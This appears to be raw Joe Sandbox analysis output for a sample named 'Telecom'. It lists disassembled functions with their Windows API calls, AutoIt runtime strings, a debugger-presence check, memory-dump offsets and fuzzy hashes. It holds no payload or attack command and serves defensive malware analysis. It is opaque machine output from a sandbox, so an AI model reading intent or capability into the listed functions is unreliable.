                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: cbcf0487f2222cb4524ff73b6c5013c23aab5df10184951b129d0bbb54878851
                                                      • Instruction ID: e811300fc766d83bb7a00f4513e2eac931f801a369bcb9d71f17932b4fbc06f7
                                                      • Opcode Fuzzy Hash: cbcf0487f2222cb4524ff73b6c5013c23aab5df10184951b129d0bbb54878851
                                                      • Instruction Fuzzy Hash: 0BF0F975E4111466D704A7658C41FFE7768EF52748F40092BB422A72C1DBA89908C6A8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004D8471
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 004D847F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: LongWindow
                                                      • String ID: (Q
                                                      • API String ID: 1378638983-2768264020
                                                      • Opcode ID: ebc1097bff708748c25bde36d6c3540fc18f41dadbdf781abb5e6541d5305580
                                                      • Instruction ID: 82a224bf23d8fc9812932c70324aefc036c3c2e885619b4282fbe3516aaa2821
                                                      • Opcode Fuzzy Hash: ebc1097bff708748c25bde36d6c3540fc18f41dadbdf781abb5e6541d5305580
                                                      • Instruction Fuzzy Hash: 50F037312012859FC704DF69DC589AA77A9EB9A320F10862EF926873B0DB349851EB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004A146F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 2030045667-4017498283
                                                      • Opcode ID: 9ccd9c8d8d53386d0418814f9160fbddbaf7695a4d3a5ec0635f203d7cb10a45
                                                      • Instruction ID: a8f8f9a3f0c0408eb4c7b3c0cf66d6da07eb80b00322cf743f006bd47119dfc1
                                                      • Opcode Fuzzy Hash: 9ccd9c8d8d53386d0418814f9160fbddbaf7695a4d3a5ec0635f203d7cb10a45
                                                      • Instruction Fuzzy Hash: 59E0D83168471436D2243795AC03FC97A888F06B55F11482FF788545C29EEB245042DE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0045FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004610E2,?,?,?,0044100A), ref: 0045FAD9
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0044100A), ref: 004610E6
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0044100A), ref: 004610F5
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004610F0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 55579361-631824599
                                                      • Opcode ID: b7ff158622ce434d144c191ae5e3c07517a5110f1be8c68f729a7a284173ff9a
                                                      • Instruction ID: d823aee573015631f2486e66bde0843b9db02ea71194c25662e163865ba700d4
                                                      • Opcode Fuzzy Hash: b7ff158622ce434d144c191ae5e3c07517a5110f1be8c68f729a7a284173ff9a
                                                      • Instruction Fuzzy Hash: 19E0ED706007918BD3209F79E905746BBE4AB1470AF04CD6FE895C6661EBB8D488CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0045F151
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: `5Q$h5Q
                                                      • API String ID: 1385522511-2430067419
                                                      • Opcode ID: 468e91eacce813eed5ecb43418f32d5e730e927b2ed9816ca525bb4419cd3432
                                                      • Instruction ID: 447423d3d30b32c8ac2f5c0ca4f34878157c3e1d98888da0d92e3418b3da9eb2
                                                      • Opcode Fuzzy Hash: 468e91eacce813eed5ecb43418f32d5e730e927b2ed9816ca525bb4419cd3432
                                                      • Instruction Fuzzy Hash: B3E0DFB1504C14DBC700D72CE8619C933A2BB05B25F12417AE90287292DB282E8EEA1F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004D2E08
                                                      • PostMessageW.USER32(00000000), ref: 004D2E0F
                                                        • Part of subcall function 004AF292: Sleep.KERNEL32 ref: 004AF30A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 44d0b66ea7e9c2e146757e2ea6f0f99c152a9ca58810c0cb3b86b53e579df1bc
                                                      • Instruction ID: 4e35d6ad8b6de7277d4ee01da32987dd5603f7ef990fb7ab36f9be1833f7b7da
                                                      • Opcode Fuzzy Hash: 44d0b66ea7e9c2e146757e2ea6f0f99c152a9ca58810c0cb3b86b53e579df1bc
                                                      • Instruction Fuzzy Hash: D5D0A932B823007AE224A370AC0BFC62B14EB15B00F1008767205AA0C0C8A0A8008688
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004D2DC8
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004D2DDB
                                                        • Part of subcall function 004AF292: Sleep.KERNEL32 ref: 004AF30A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 6b94c02dfed1e0c8ed3fa8a89c07ee075f339c11b90a553a784a721a7d028c61
                                                      • Instruction ID: 8e3a635d004656d7b3d5dd374271b81b050839a9d0da6464bf2909325911a25a
                                                      • Opcode Fuzzy Hash: 6b94c02dfed1e0c8ed3fa8a89c07ee075f339c11b90a553a784a721a7d028c61
                                                      • Instruction Fuzzy Hash: FFD0A936B86300B6E224A370AC0BFD62B14EB10B00F1008767209AA0C0C8A0A8008688
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0047C213
                                                      • GetLastError.KERNEL32 ref: 0047C221
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0047C27C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: c51bd115e689e636b29d8d2857ddeffadc0e2c6bfd3028412080227400cfe6f2
                                                      • Instruction ID: 4b06e5150e98ff952a73a413476911204519407b31e74b53f05b66a3fb12461c
                                                      • Opcode Fuzzy Hash: c51bd115e689e636b29d8d2857ddeffadc0e2c6bfd3028412080227400cfe6f2
                                                      • Instruction Fuzzy Hash: 6041C730E00605EFDB218FE5C884AEB77A5EF55710F1481AFE85DA72A2DB348D01CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%